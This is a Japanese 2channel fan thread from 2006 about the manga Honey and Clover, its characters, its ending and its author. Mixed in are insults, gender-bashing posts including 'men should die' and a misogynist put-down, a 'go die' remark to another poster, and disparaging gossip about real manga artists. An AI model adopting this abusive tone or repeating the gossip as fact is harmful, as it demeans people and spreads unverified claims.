山田の女友達ってはぐしか出てきてないから厳しく言うのは無理だよ
どうみても経験不足で恋愛相談にのれるタイプじゃない
でも多分合コン仲間の女友達らには口角泡をとばして言われてるんじゃないw

487 :花と名無しさん:2006/09/23(土) 15:10:04 ID:???0
>>480>>481
「本当の友達なら厳しく言うべきだ」とか言いつつ本心はグダグダと恋愛グチ
聞くのがウザイだけだったりするよね
悩んでる子の性格にもよるけど本気で好きで諦めきれずに苦しんでるのが
解かれば安易に自分の考えを押し付けて「こうするべきだ!」とは言えないもんだよ
自分でもやっぱり美和子さんがしたみたいにちょっとした気分転換をさせたり
ヤケ酒に付合うくらいしかできないと思うな


488 :花と名無しさん:2006/09/23(土) 15:22:29 ID:???O
真山のストーカー愛は責めないでは山田の真山への未練は責める臭を見てから見限り始めた

489 :花と名無しさん:2006/09/23(土) 15:27:32 ID:???0
真山のアレは犯罪入ってるのに許容してるあの世界の感覚が良く分からん
自分の友達がストーカーしてたら流石に止めるよ
恋愛は自由だけど犯罪はいかん

490 :花と名無しさん:2006/09/23(土) 15:29:02 ID:???O
>>487はうざいから言うんだ・・

491 :花と名無しさん:2006/09/23(土) 15:30:27 ID:???O
>>487が一番意見を決め付けて押しつけてるように見えますが

492 :花と名無しさん:2006/09/23(土) 15:33:53 ID:???0
>>487 同感
若いうちは友達同士で恋愛相談するけど大人になるにつれ口出ししなく(できなく?)なってくるね。
自分にまともな恋愛経験ほとんどないまま年とっちゃった女性に限って「諦めろ」「やめたほうがいい」
とうるさく口出しする不思議
山田のことは途中まではまわりも色々言いたげだったけど野宮を好きになり始めてるのわかって
見守ってるんだよ。
この「フラれた男を引きずりつつ新しい男のアプローチに揺れる女」ってのは一番始末におえないからねw

493 :花と名無しさん:2006/09/23(土) 15:36:52 ID:???0
>>490
女友達の恋愛グチきくのウザくない人っているんだ・・・・私が鬼なのか

494 :花と名無しさん:2006/09/23(土) 15:44:06 ID:???O
>>493
そんなひどい愚痴を言う女友達がいないから。

495 :花と名無しさん:2006/09/23(土) 15:51:03 ID:???0
>>493
いや普通にウザイでしょ
一度や二度ならともかく会うたびグチられたら超ウゼーよ
ウザクないってのは恋愛相談してくる女友達がいないんだよ

496 :花と名無しさん:2006/09/23(土) 15:56:20 ID:???0
相談っていうより単なる愚痴だからなー
上手くいってる場合の惚気より質悪い

497 :花と名無しさん:2006/09/23(土) 16:41:30 ID:???0
惚気 これノロケって読むんだ 覚えた

498 :花と名無しさん:2006/09/23(土) 16:43:55 ID:???0
本当に相談だったら自分の意見を厳しく言ってもいいけど
大抵は聞いて欲しいだけなんだよね…それくらいしてあげたいが、
毎回だといくら親友でも勘弁。

山田はスイッチが入ると愚痴るけどいつもってイメージじゃない。
しょうがない奴だと同情して美和子さんみたいに慰めてあげたくなるかも。
人に対して誠実ってことだし。

499 :花と名無しさん:2006/09/23(土) 16:47:36 ID:???0
>>478
ウミノさんは日記でキャラを作ってるとか、
ウミノさんの日記の文体が痛い
みたいな批判が過去ログであった時に
作者と間近で話したことがあるという人が
「羽海野さんは普段からああいうしゃべり方なので
 日記でキャラを作ってるわけではない。
 『おはよう? 今日はわたしの好きな天気ですよ?』
 のようなしゃべり方をする」
という内容を書き込んでフォローしてたことがある。

2ちゃんの書き込みだから、その人の書き込みの内容が
真実かどうかはわからないけど、もしそれが真実だったとしても
全然フォローになってなかった。
普段でもそういう口調でしゃべってるのかよ…('A`)と
かえって住民が萎えてたので。


500 :花と名無しさん:2006/09/23(土) 16:54:10 ID:???0
作者が友達出来ないのなんでかな?と言ってるのに、
スレでは住人が女友達との関係を語りあう・・・ワロスw

501 :花と名無しさん:2006/09/23(土) 16:59:36 ID:???0
山田は酒が入るとグチりだすタイプっぽい


502 :花と名無しさん:2006/09/23(土) 17:08:58 ID:???0
>>500
作者の「友達できない」は本当に友達のいない人間は言えないっポ
ハチクロのブレイクで色んな人とたくさん出会いはあったけどなかなか親しい友達に発展してかないってことなんじゃないの

503 :花と名無しさん :2006/09/23(土) 17:12:35 ID:???0
本名がひろみと聞いて
エースをねらえが大好きで特別思い入れあるように言っていたのが
え・・・?ヒロインと同じ名前だから・・・?と思ってしまった
いや普通に名作だけどさ

504 :花と名無しさん:2006/09/23(土) 17:15:07 ID:???0
>>502
そんなこと公に何度も書くもんなの?
確かに本当にいないと言えないよな…

え?私友達と思われてないの、と
誤解する人でてきそう。



505 :花と名無しさん:2006/09/23(土) 17:17:21 ID:???O
番外編で山田の合コン荒らしの話あったけど、初対面の人にも愚痴りまくってるようじゃん・・・

506 :花と名無しさん:2006/09/23(土) 17:21:16 ID:???0
>>499
そういえばオタクの人って変なイントネーションでしゃべる人多い気がする
昔と違って見た目はさほどおかしくなくてもしゃべりだすとオタクっぽさが
でるというか。内容のことじゃなく変に早口だったり声が上ずってたり
芝居がかった話し方るイメージがあるなーウミノさんは知らないけど


507 :花と名無しさん:2006/09/23(土) 17:27:11 ID:???0
>>505
だから山田は酒飲むと荒れるタイプなんだよ
一緒に飲みたくね〜!!!

508 :502:2006/09/23(土) 17:32:04 ID:???0
>>504
あ、ゴメン私はその発言のことはここでしか見たこと無い

でも確かに周囲の人間が目にしたら
「ワタシ友達にカウントされてないのか・・・・・・・・orz」
と思いそうだよね

509 :花と名無しさん:2006/09/23(土) 17:32:23 ID:???0
同人時代に羽海野さんと一緒に旅行にいったり仲良く遊んでいたり
羽海野さんの出世を喜んでWEBの日記に書いて祝福してた同人友達は
羽海野さんの目からは友達じゃなかった様子でww

きっと同人でできた友達は羽海野さん的に「捨て」なんだよ。
プロになってから知り合った声優や作家やマンガ家や
ミュージシャンやクリエーターは、羽海野さん的に「友達」なんだよ。

だから毒舌のババァ少女漫画家に
米つきバッタなんて言われるんだ。

510 :花と名無しさん:2006/09/23(土) 17:38:22 ID:???O
そりゃ集英社で漫画の仕事しちゃったんだから仕方ないよ……

スラダンやナルトのパロ同人やってたことはウミノ的に黒歴史なんだろう

511 :sage:2006/09/23(土) 17:48:17 ID:VaXesYO60
9巻までは結構期待してたんだがなあ。
何だかんだと人間の黒い部分を打ち出してきたので、
鬱エンドの中にも希望を的な終わりになるのかなと。
結局は割とイージーなハッピーエンドで、悪い意味での意外性重視、
唐突なだけのまとめ方になったようで惜しい。
決して嫌いじゃないが、重さに欠ける作品になってもた。

>>211
不滅の牙乙。

512 :511:2006/09/23(土) 17:49:30 ID:???0
うっわ、俺イタ-。

513 :花と名無しさん:2006/09/23(土) 18:02:05 ID:???0
>>510
つ「集英社の少年漫画のホモ同人をやっていて
  集英社の少女漫画誌でデビューしたマンガ家は
  羽海野だけじゃないが(実例:尾崎南ほか)
  羽海野以外の元同人女マンガ家は
  同人時代の愚痴を語ったりしない」

つ「羽海野は自分からヤングユー(集英社少女漫画誌)に
  持ち込みに行った。
  後ろめたいことがあるんなら、もっとマイナーな雑誌に
  持ち込みに行けばよかったのに」

514 :花と名無しさん:2006/09/23(土) 18:07:45 ID:???0
>>509
というよりも大人になると友達ってできにくくならない?
大学までにできた友達と社会人になってからできた友達にも微妙な違い
があるように売れる前からの友達と売れてからの友達はいろんな意味で
別物な気がする。

515 :花と名無しさん:2006/09/23(土) 18:12:42 ID:???0
>>513
尾崎南ほど周囲にグチりまくりの女は同人界でもなかなかいないよ・・・・・
彼女の嫌われぶりはウミノの比じゃないよ


516 :花と名無しさん:2006/09/23(土) 18:17:18 ID:???O
最初は頑張って「作品」を創ってたけど、半ば〜後半の漫画は
仕事をシビアに感じて行くうちに
「私が創った物なら、それだけでもうハチクロの世界観は完成する!」って
割り切っちゃった感じがした。作者の甘えがキャラの個々にまで
だだ漏れしていると言うか、個人個人のだらしない部分が目立つ。
最初の方がキャラ一人一人独立してたような。
後半はもうキャラ自体が「自分はこんなキャラ担当っスから。」みたいな
甘え?向上心が停止してしまってると言うか。
そこに羽海野さんの甘えやら妥協やら諦めやら飽きが見えるのが残念だた。

517 :花と名無しさん:2006/09/23(土) 18:52:40 ID:???0
尾崎南!ナツカシスww
尾崎は少女漫画誌に書いたってだけで中身はエロを自主規制しただけの
ヤオイ同人だったもんな
話を収集できなくなって放り出すあたりも同人作家のまま
尾崎南こそヤオイ同人→少女漫画作家になったやつらの黒歴史だよ
ウミノも最後やっつけ仕事に入っちゃったけど終わらせただけマシか

518 :花と名無しさん:2006/09/23(土) 20:08:32 ID:???0
>>515
メヒョはクレクレ厨で色々痛い人だけど他人の悪口だけは言わないよ
それはヲチスレ化してるメヒョスレでも認められてる彼女の唯一の美点

519 :花と名無しさん:2006/09/23(土) 20:23:59 ID:???0
竹本はAT限定の免許でよかったんだろうかw

520 :花と名無しさん:2006/09/23(土) 20:31:27 ID:???O
あれ、AT限定だったんだ、そこまで読んでなかったw
トラックはマニュアル多いから大工としてはよくないような気もする
どうなんだろう…

521 :花と名無しさん:2006/09/23(土) 21:01:28 ID:???0
確かにAT限定だと仕事柄やばい。

522 :花と名無しさん:2006/09/23(土) 21:22:10 ID:???0
>515
尾崎南は漫画かけなくてぼったくりアクセ売るように
今や落ちるとこまで落ちてるけど
悪口を言わないのだけが美点だと思うよ。
たんに究極のナルなので他人が気にならないだけだろうけど。

第一同人界ではもう過去の人でしょ、尾崎って。
あ、商業でもそうか。

523 :花と名無しさん:2006/09/23(土) 21:36:36 ID:???0
女豹さまの話は専スレでしましょうや

524 :花と名無しさん:2006/09/23(土) 21:38:12 ID:???0
なんで作者のパーソナリティーが評価の対象になるんだろう?
作品の良し悪しを直接評価すればいいのに

525 :花と名無しさん:2006/09/23(土) 21:48:56 ID:???0
スレ違いだけど尾崎はよく同人誌の後書きに小さな字で
何ページもグチをこぼしてた記憶があるな。
よく覚えてないけど「みんなどうして私をこんなに
苦しめるの!」とか書いてあったのが印象に残ってる。
何に苦しんでたのかは覚えてないけど。

526 :花と名無しさん:2006/09/23(土) 21:49:50 ID:???0
>>523
そうだね


527 :花と名無しさん:2006/09/23(土) 22:10:17 ID:???0
>>524
同感ではあるけど作家もメディアに出ること多いしHPだブログだと
露出がある以上本人が評価の対象になるのは避けられないのが現実

このスレでもよくいわれるけど嫌なら極力前に出ないしか方法はない
まあ出なきゃ出ないでアレコレ勝手なイメージが一人歩きしてしまう
こともあるけどね


528 :花と名無しさん:2006/09/23(土) 22:15:37 ID:???O
>>524
作者を完全に抜きにして作品は語れないよ。
作者という人間の一部分が作品なんだから

529 :花と名無しさん:2006/09/23(土) 22:19:02 ID:???0
アニメの最終回はスピッツの「きみが思い出になる前に」が流れることを
期待してたんだけど、やっぱりメジャーな曲は無理だったみたいだね。

530 :花と名無しさん:2006/09/23(土) 22:19:28 ID:???0
作家は自分を切り売りするものだって
いうけどね。

531 :花と名無しさん:2006/09/23(土) 22:19:55 ID:EGtlGT4l0
>>524
作品にパーソナリティーは透けて見えるものじゃないかな。
雪が印象的な漫画を書いた人が、大学時代に雪の多いところで暮らしてた
って知って、なるほどと思った。
「なんでこの台詞なんだろう」「なんでこんな場面になるんだろう」って
疑問を持ったとき、作者個人に興味が向くって自然な気がする。
良くあるのは文庫の著者略歴とか。療養中にこの小説書いたのかーとか
想像すると楽しい。


532 :花と名無しさん:2006/09/23(土) 22:23:30 ID:???0
たとえば、どんなに素晴らしく、人を感動させる音楽でも
つくった人間が最低のクズだったら、その音楽は評価に値しないのか?

533 :花と名無しさん:2006/09/23(土) 22:24:29 ID:???O
>>532
は?なにこの勘違い

534 :花と名無しさん:2006/09/23(土) 22:33:13 ID:???0
>>532
たとえどんなに素晴らしく、人を感動させる音楽を作る人間だとしても
最低のクズだったらそのうち作品も腐ってくるよ。

535 :花と名無しさん:2006/09/23(土) 22:33:36 ID:???0
例えるなら、ブランド銘がついてなければ
服の良し悪しが判断できないようなもの

536 :花と名無しさん:2006/09/23(土) 22:33:39 ID:???O
>>532
そう思う人もいていいとオモ

作品だけ評価したいならいいけど、
作品が生まれた背景は必ずあるわけだし

537 :花と名無しさん:2006/09/23(土) 22:51:32 ID:???0
才能と人間性は別物だけど、作者は痛いけど作品は好きと割り切るには
作品に有無を言わせない力が必要だと思う。
>つくった人間が最低のクズだったら、その音楽は評価に値しないのか?
つくった人間が最低と感じさせない、または忘れさせる作品なら評価する。

538 :花と名無しさん:2006/09/23(土) 23:07:41 ID:???0
>>534
それは幻想だよ
美しい作品は全て心も見た目も美しい人間が作ってるとおもってるのか?

539 :花と名無しさん:2006/09/23(土) 23:10:27 ID:???O
>>538
それも性悪説的な幻想

540 :花と名無しさん:2006/09/23(土) 23:22:46 ID:???0
>>539
どこをどう読み取ったら性悪説に?

541 :花と名無しさん:2006/09/23(土) 23:41:05 ID:???0
一般的にマンガ家も作家も変人とか変わった人が多い気がするな
特に信者と呼ばれるファンがたくさんつく人はイタイ人が多い気が・・・・・
上にもチョロリと名前が出てるけど彼女も相当痛かった!
物を作るってすごくパワーがいるだろうからそれで成功する人は
良くも悪くもインパクト強い人間がおおいのかも

そして何も生み出せない我々はヒマだから人様の作った物を
金払って読んであーだこうだと評価しつつ楽しむと

542 :花と名無しさん:2006/09/23(土) 23:53:16 ID:???0
フツーの人が作ったものなんて面白くないもんなー

543 :花と名無しさん:2006/09/23(土) 23:57:05 ID:???0
この流れを見て何故か猫殺しした作家のことを思い出した

544 :花と名無しさん:2006/09/24(日) 01:12:51 ID:???0
>>510
その羽海野さんのスラダン同人誌を一条さんは読んだのかな?
集英社の忘年会でイノタケ取っ掴まえて三井のイラスト入りの
色紙書かせたことがあるとテレビで言っていたが。

545 :キモヲタ:2006/09/24(日) 01:26:05 ID:???0
薫に足ツボぎゅっぎゅされたい

546 :花と名無しさん:2006/09/24(日) 01:31:16 ID:???O
>>534
真っ先に温帯が浮かんだ
この人も酷い天才マンセーだったな

547 :花と名無しさん:2006/09/24(日) 01:55:30 ID:???0
>>543  誰それ

548 :花と名無しさん:2006/09/24(日) 02:09:09 ID:???0
>>547
【社会】 「子猫を殺す時、自分も殺してる」 作家・坂東さん、真意語る…タヒチ管轄政府は告発の動き★7
http://news19.2ch.net/test/read.cgi/newsplus/1159024776/

549 :花と名無しさん:2006/09/24(日) 02:23:01 ID:???0
作品に作家の人間性が出ると言っても人間性がわかるほど作家と親しいヤツいる?
雑誌のインタビューや本の後書きとかブログ見ての印象がほとんどだろうけど
あれはあれで作った作家像なんじゃないかと邪推してしまうんだが・・・・・。
ウミノさんはハチクロがあって「その世界観からなるべくはずれないワタシ」
な部分を多く露出してるだけで私生活もメルヘンかはわからんよ。



550 :花と名無しさん:2006/09/24(日) 02:30:43 ID:???O
キャラ作ってるならウミノ腹黒w

インタビューや後書きより漫画本編の方が
如実に人間性が出ると思うよ

551 :花と名無しさん:2006/09/24(日) 02:44:26 ID:???0
ネットラジオで羽海野さんのしゃべりを聞いた時
浜田マリっぽいなぁと思った。

552 :花と名無しさん:2006/09/24(日) 02:51:47 ID:???0
浜田マリの喋りは職業としては武器になるだろうけど
一般人であの喋りは引く
同じようにマラソンの松野明美も引く
あの人はオタクってわけじゃないだろうけど

553 :花と名無しさん:2006/09/24(日) 02:58:19 ID:???0
羽海野さんの日記読んでる人なら知ってると思うけど
山田役の声優さんのネットラジオに羽海野さんがゲストで出てるやつ、
まだぎりぎり聞けます。

ttp://shop.frontierworks.jp/digital/web_radio/detail_037.asp
ここの一番下の
パート3 ゲストトークと美佳子の情報

554 :花と名無しさん:2006/09/24(日) 04:04:19 ID:???0
漫画の中の世界だと分かりつつ、
こんな痛々しい言動の奴らおらんだろーと思いながら読んでたけど
上記ののラジオ聴いたとき唖然とした。
ウミノさん自身はそんなでもないが
周りの声優さんたちのテンション、ノリ、喋り方…。
ラジオだから普段とは多少違うんだろうが…おみそれしました。

555 :花と名無しさん:2006/09/24(日) 08:19:49 ID:???0
>>554
声優は、仕事でやってるんだから
トークの時もキャラ作ってるんじゃない?

556 :花と名無しさん:2006/09/24(日) 08:52:44 ID:???0
初めて聞いたけど声老けてるね

557 :花と名無しさん:2006/09/24(日) 09:22:19 ID:???0
>>555
でも普段とは全く違うということは無いとオモ・・・。

558 :花と名無しさん:2006/09/24(日) 10:01:15 ID:???0
現に普段からああいうしゃべりのオタクの子ってゴロゴロいるしね
秋葉とか行くと男も女もそういう子ばっかりだ

559 :花と名無しさん:2006/09/24(日) 12:32:03 ID:???0
>>556
40近い人だからね・・・

560 :花と名無しさん:2006/09/24(日) 12:33:08 ID:???0
好きな作品ではあるんだけど・・ラスト辺りがねえ・・
はぐが大怪我して、追い詰められたからこそ答えを出せたんだよね。
普通の状態で、彼女がああいう告白をするという展開はできなかったのか?
無理かな・・


561 :花と名無しさん:2006/09/24(日) 12:40:04 ID:???0
そうなんだよ。展開が派手すぎて現実感なくなっちゃったんだよね。

562 :花と名無しさん:2006/09/24(日) 12:49:15 ID:???0
連載開始当時から、はぐのキャラが白痴的なのが受け入れがたかったけど
結局最後まで修との共依存から抜け出せなかった。
キャラクターそれぞれが道を選ぶ中で、はぐがたとえ短期間でも
「一人でやってみる」ことを選択したのならもっと清清しかったのかも・・・と思うよ。

あと、ウミノさんには原田さんタイプの人がメインキャラとしては描けないのかな。
ローマイヤー先輩とか原田さんとか、ちょっぴりしか出てこない。
地に足のついた成熟した男性像が足りない気がしました。きっと身近にいないんだろうな。

563 :花と名無しさん:2006/09/24(日) 12:49:48 ID:???0
州を道連れに海外留学するのかと思った。

564 :花と名無しさん:2006/09/24(日) 13:20:57 ID:???0
海外留学どうなったんだろうね。入院・リハビリで立ち消えかしら。

突然だけど絵を描く話でラストが良かったのはさくらの唄だな。
スレチか・・・。

565 :花と名無しさん:2006/09/24(日) 14:17:52 ID:???0
>>564
そういえば羽海野さん、「バカ姉弟」が好きだって言ってるね。

566 :花と名無しさん:2006/09/24(日) 14:33:26 ID:???0
>>562
ローマイヤ先輩とか原田とか、あるいは竹本の義父とか
ああいう好人物キャラはうそ臭いよ。脇役だから成立するキャラ。

567 :花と名無しさん:2006/09/24(日) 14:55:12 ID:???0
んなことない。
オッサン向けマンガ誌には主役級で
出てきそうなキャラじゃないか。

568 :花と名無しさん:2006/09/24(日) 14:56:18 ID:???0
竹本の義父の親族達もうそ臭いよ。
普通息子や甥や孫が自分とそんなに年の違わない子供のいる10歳以上年の離れた女性との
結婚なんか快く許すはずがないよ。

569 :花と名無しさん:2006/09/24(日) 15:20:49 ID:???0
>>568
別にそんなの普通にあるけどな
確かに複雑だろうけど息子のこと認めてたら反対はしないよ
友達の兄がそういう相手と結婚して今も幸せに暮らしてる
でも竹本母があそこまでチヤホヤされるのは
この漫画の女性マンセーっぷりの一環だろうね

570 :花と名無しさん:2006/09/24(日) 15:53:42 ID:???0
それよりも竹本母の見た目が若すぎて違和感。
皺ひとつ描かれてないんだもの。


571 :花と名無しさん:2006/09/24(日) 16:03:43 ID:???0
山田のママンも若くてキレイな感じだった気がする

572 :花と名無しさん:2006/09/24(日) 16:05:24 ID:???0
若い男を捕まえる見た目が若い高齢女は、羽海野の自己投影の一貫。

573 :花と名無しさん:2006/09/24(日) 16:06:17 ID:???0
不思議の国のアリスの文庫の表紙がはぐになってた

574 :花と名無しさん:2006/09/24(日) 16:37:34 ID:???O
>>570
皺ないのは確かに変。
まっすぐな男の人に大事にされるってのはウミノの夢の一部分が出た?

575 :花と名無しさん:2006/09/24(日) 17:09:06 ID:???0
いろんなことが尻切れトンボだった

576 :花と名無しさん:2006/09/24(日) 17:26:46 ID:???0
好きな男の腕の中でも
違う男の夢を見るはぐ〜

577 :花と名無しさん:2006/09/24(日) 17:54:45 ID:???0
これだけ女性に都合よく滅私奉公な男だらけで
男性読者は不快には思わないものなのかな。

578 :花と名無しさん:2006/09/24(日) 18:23:50 ID:???0
男だが、山田さんのような
美人で才能あるおにゃのこが相手なら甘えられても不快にはならない
2chに書き込んでるような
才能もなく猫背メガネブスでキモく臭い腐女死は問題外

579 :花と名無しさん:2006/09/24(日) 18:35:01 ID:???0


そうだね、そうだね

580 :花と名無しさん:2006/09/24(日) 18:39:34 ID:???0
安い男だな。

581 :花と名無しさん:2006/09/24(日) 18:51:21 ID:???0
>>577
別に
ここで作者叩きしてる同人女には不快になるが

582 :花と名無しさん:2006/09/24(日) 19:12:18 ID:???0
>578
その2chで腐女子と自分の間に線を引き馬鹿にしたり
女ヲタと男ヲタを相対的に見てどうのこうのと文句をいったりしている
御自身こそリアルでも2ch内でも問題外だと思うが

「自分はこいつらほど痛くない」
と本気で信じていなければ出来ないだろうな、そういう物言いは
久々に見た

583 :花と名無しさん:2006/09/24(日) 19:20:05 ID:???0
>>582
男の書き込みヲチするの面白いから、黙ってて。

584 :花と名無しさん:2006/09/24(日) 19:32:39 ID:???0
あっすまん
それでか 妙に誰もツッコまないのは

585 :花と名無しさん:2006/09/24(日) 19:36:18 ID:???0
男って馬鹿だよね

586 :花と名無しさん:2006/09/24(日) 19:41:58 ID:???0
その男の真似をして一括りにすんなよ
変な方向に盛り上がっちゃうだろうが

587 :花と名無しさん:2006/09/24(日) 19:43:09 ID:???O
>>578
大丈夫、お前にはどんな女も頼らない

588 :花と名無しさん:2006/09/24(日) 19:47:02 ID:???O
まっすぐで頼りがいがあって好きな人に一途ででかい男ってのに潜在的に憧れがあるんじゃないか?
真山みたいなイケメン系は妄想やギャグの対象として散策いじくれるけど、
そういうタイプは憧憬に収めてあるフシがある

589 :花と名無しさん:2006/09/24(日) 19:47:55 ID:???O
×散策
◎散々

590 :花と名無しさん:2006/09/24(日) 19:49:40 ID:???O
>>581
認定厨乙

591 :花と名無しさん:2006/09/24(日) 20:22:18 ID:???0
>>588
> まっすぐで頼りがいがあって好きな人に一途ででかい男
ってハチクロにいる?

592 :花と名無しさん:2006/09/24(日) 20:57:11 ID:???O
竹本の義父やローマイヤじゃない?

593 :花と名無しさん:2006/09/24(日) 20:57:31 ID:PwVmGPk20
羽海野チカっていう元同人作家はかわいいん?ぶさいくなん?

594 :花と名無しさん:2006/09/24(日) 21:11:52 ID:???0
>>592
脇役ばっかだな

595 :花と名無しさん:2006/09/24(日) 21:12:53 ID:???0
>>593
アンチスレとここにマルチ乙。


596 :花と名無しさん:2006/09/24(日) 21:41:23 ID:???0
作品を評価するのに、作者の容姿は関係ないと思う

597 :花と名無しさん:2006/09/24(日) 21:45:55 ID:???0
男って馬鹿だよね

598 :花と名無しさん:2006/09/24(日) 22:09:03 ID:???0
女も馬鹿だよ

599 :花と名無しさん:2006/09/24(日) 22:12:58 ID:???0
>>591
竹本にもっと頼りがいがあれば・・・
竹本がもっとでかい男なら・・・
真っ直ぐさと一途さだけは無駄なくらいあるんだよな。

600 :花と名無しさん:2006/09/24(日) 22:17:45 ID:???0
多分しばらく成長すれば頼りがいもある人間になるんじゃない?

601 :花と名無しさん:2006/09/24(日) 22:20:45 ID:???0
頼れるようになっても自信に満ち溢れるようなタイプではないだろうなw

602 :花と名無しさん:2006/09/24(日) 22:23:06 ID:???0
竹本かわいいよ竹本

603 :花と名無しさん:2006/09/24(日) 22:25:07 ID:???0
女性の平均IQは320です。
男の平均IQは60です。

男って馬鹿すぎ。
死ねばいいのに。

604 :花と名無しさん:2006/09/24(日) 22:26:33 ID:???0
あれ、性別叩き終わり?

605 :花と名無しさん:2006/09/24(日) 22:28:02 ID:???0
>>603 同属嫌悪はそのぐらいになさいな......

606 :花と名無しさん:2006/09/24(日) 22:29:25 ID:???0
>>603
こういうレスって男がしてるんだろうなと思うのは単純過ぎるかな

607 :花と名無しさん:2006/09/24(日) 22:32:45 ID:???0
なぜかまうんだか

608 :花と名無しさん:2006/09/24(日) 22:36:21 ID:???0
これだけは言える


NANAよりはマシ

609 :花と名無しさん:2006/09/24(日) 22:39:49 ID:???O
>>594
下手に汚しきれない憧憬で収まっているから脇役ばかりなんだよ。
完全に妄想や自己投影の域になると臭やはぐになる。

610 :花と名無しさん:2006/09/24(日) 22:57:29 ID:???0
飲み屋やマヤマヤ臭が大人かな?
あんな、自分達だけ青春から高い位置にいるつもりで
さんざ批評家気取りした挙句に、おいしい魚だけ狙って釣ってくようなの。
見苦しいよ。
そんな大人、修正してやる。

611 :花と名無しさん:2006/09/24(日) 23:15:22 ID:???0
スガシカオ「村上春樹の本に僕の歌が出てきたのがデビュー10年で一番うれしかった」

612 :花と名無しさん:2006/09/24(日) 23:31:14 ID:???0
デスノの時だったか?
その時も喜んでたっけなw
ウミノさん哀れ

613 :花と名無しさん:2006/09/24(日) 23:39:49 ID:???0
全巻読んでここにきた
あ〜やっぱ少女漫画だけあって男性漫画のスレとは全然違うね
男から見た少女漫画って数読んでないから比較もできないし・・
いやする必要ないんだろうけど
まあとにかく
最後先生を選んだのは意外だった
え?いつから?って
回想で田舎にいた時からってのがあったがアレ後付だよね
森田好きだったじゃん、と
あと最後で主人公が竹本だったの思い出したw

8巻くらいでなんか進展ないから売ろうかとも思ったが
一応結末まで見届けよう、と
まあ俺が男だからかもしれんが単純?なエンドでよかったよ
逆に言えば誰にも感情移入できなかったとも言えるけど
竹本が主人公なんだろうけどそれを感じさせなかったのがウリなんでしょうねぇ



614 :花と名無しさん:2006/09/24(日) 23:43:45 ID:???0
男性漫画のスレでも長文のチラ裏どうぞな感想レスは好まれないと思うよ

615 :花と名無しさん:2006/09/25(月) 00:48:00 ID:???0
578みたいな煽りに弱いのがハチクロの世界って感じだな

616 :花と名無しさん:2006/09/25(月) 00:59:25 ID:???0
後学のために、>>615には
>>578のような低俗な煽りへの正しい対処法を見せて欲しい

617 :花と名無しさん:2006/09/25(月) 01:01:19 ID:???0
はぐの家族ってどうなってんの?
あの見舞いに来てたのは?
あと春に生まれるのは誰の赤ちゃん?


618 :花と名無しさん:2006/09/25(月) 01:14:43 ID:???0
修が歳をくっていって、ボケとか始まったりしたら、はぐはどうするんだろう
パトロンと芸術家の関係にしか見えないせいか、年齢差も15違うし、そういう時どうすんだろうと思ってしまった
1)ボケる前に縁をきっておく。(すでに新たなパトロンゲットしている)
2)芸術は捨てて介護生活始めます
3)芸術は捨てません、修は介護施設へ。

619 :花と名無しさん:2006/09/25(月) 01:53:33 ID:???O
ボケません
はぐに一切手間かけさせません
そもそもそんな現実味のある内容は描きません
修ははぐの救世主、そこで終わりです
その位置づけに未来永劫変化なしです

はぐがどんなに老いてもボケても
余裕で介護する側の役割を果たし、はぐの最期を看取ります

ついでにいうと
はぐがどんなに老いてもボケても余裕で勃ちます

修はそういうハッスルジジイへ進化を遂げたのです

以上

620 :花と名無しさん:2006/09/25(月) 02:19:41 ID:???0
>>618
一緒に箱を開けてくれる臭ちゃんがボケたら
はぐは自殺すんじゃね?

絵が描けなくなったら命を神様にお返しします=自殺します
と心の中でほざいてたし。
それか、ボケた臭ちゃんと一緒に心中。
臭ちゃんもはぐのためなら死ねるヌヌネネヌヌネノ(゚∀゚)


「臭ちゃん あのね 最期のおねがいが あるの
 ずーっとまえに『臭ちゃんの人生ください』って 言ったよね?
 それを もういちど いわせて
 臭ちゃん、わたしと一緒に てんごくに いってください」

621 :花と名無しさん:2006/09/25(月) 04:49:28 ID:???0
>>618
はぐはああ見えて高校生のうちからボケた婆さんのめんどうみてたんだから
修がボケたら面倒もみてくれるよ


622 :花と名無しさん:2006/09/25(月) 07:00:28 ID:???0
>>621
でもそれじゃ創作のために修を選んだ意味がなくなるかも。
創作できなければ死んじゃうそうだから
自分がだめになったわけじゃなし
生きるために他のパトロンを見つけるほうが有力だとおも。

623 :花と名無しさん:2006/09/25(月) 09:24:19 ID:???0
「命をお返しします」
「人生をください」

というセリフがそもそも理解し難いんだが

624 :花と名無しさん:2006/09/25(月) 09:32:41 ID:???0
誰も一切触れていないので言いにくいが

正直>>619が一番有力だと思う

625 :花と名無しさん:2006/09/25(月) 12:14:49 ID:???0
修なら619でも違和感ない…w

ホントに修になんかあったら
修自身がはぐの前から姿を消すか
進んで施設に入りそう。ボケも突然なるもんじゃないし。


626 :花と名無しさん:2006/09/25(月) 12:26:12 ID:???0
山田=ユニコーンが貞操を守る純潔乙女
リカ=絶滅危惧種
はぐ=弱小保護動物、障害者

女が大事にされるべきすぎ

627 :花と名無しさん:2006/09/25(月) 12:27:28 ID:???0
今10巻読んだけど、叩き落とした社長のサポってローマイヤ先輩の出し所だった希ガス。

628 :花と名無しさん:2006/09/25(月) 12:27:50 ID:???0
>>623
あげられるものなんて心くらいしかない
っていう、竹本のセリフもありましたね。

629 :花と名無しさん:2006/09/25(月) 13:27:34 ID:???O
>>617に答えてー
誰もわからないなら仕方ないけど・・

630 :花と名無しさん:2006/09/25(月) 13:32:53 ID:???0
>>629
見舞に来てたのははぐ父とその婚約者(もしくは嫁)
春にうまれる赤ちゃんははぐの異母妹。

631 :花と名無しさん:2006/09/25(月) 13:33:43 ID:???0
>617>629に答えられるのは、

「バカにつける薬はない」

という言葉だけです


632 :花と名無しさん:2006/09/25(月) 13:33:52 ID:???0
×異母妹
○異母妹(もしくは弟)

633 :花と名無しさん:2006/09/25(月) 22:14:33 ID:???0
修はパトロンとは言わないでしょ。金を出して作品を書かせてる立場じゃないんだから。
どっちかつーとヒモ。一緒にパトロンを探す立場。

634 :花と名無しさん:2006/09/25(月) 22:22:44 ID:???0
>627
ワロス。ついでにカオルのサポもお願いしたい。

落とされた社長たちの住む家って、カブたんがあるから
もともとは森田一家が住んでた家ってことでいいんだよね?

635 :花と名無しさん:2006/09/25(月) 22:32:31 ID:???0
>>630
ありがとう

>>631
全財産を寄付して人の迷惑にならないようにしね

636 :花と名無しさん:2006/09/25(月) 22:34:37 ID:???0
>>626
男が弱いのばっかりだから、相対的に女も弱くしないとバランスが取れないのでは。

637 :花と名無しさん:2006/09/25(月) 22:37:24 ID:???0
>>634
似たような家を用意しただけ。
森田家は国内。こっちは海外。
カブたんだけ持ってきた(またはレプリカ)

638 :花と名無しさん:2006/09/25(月) 22:38:44 ID:???0
>637
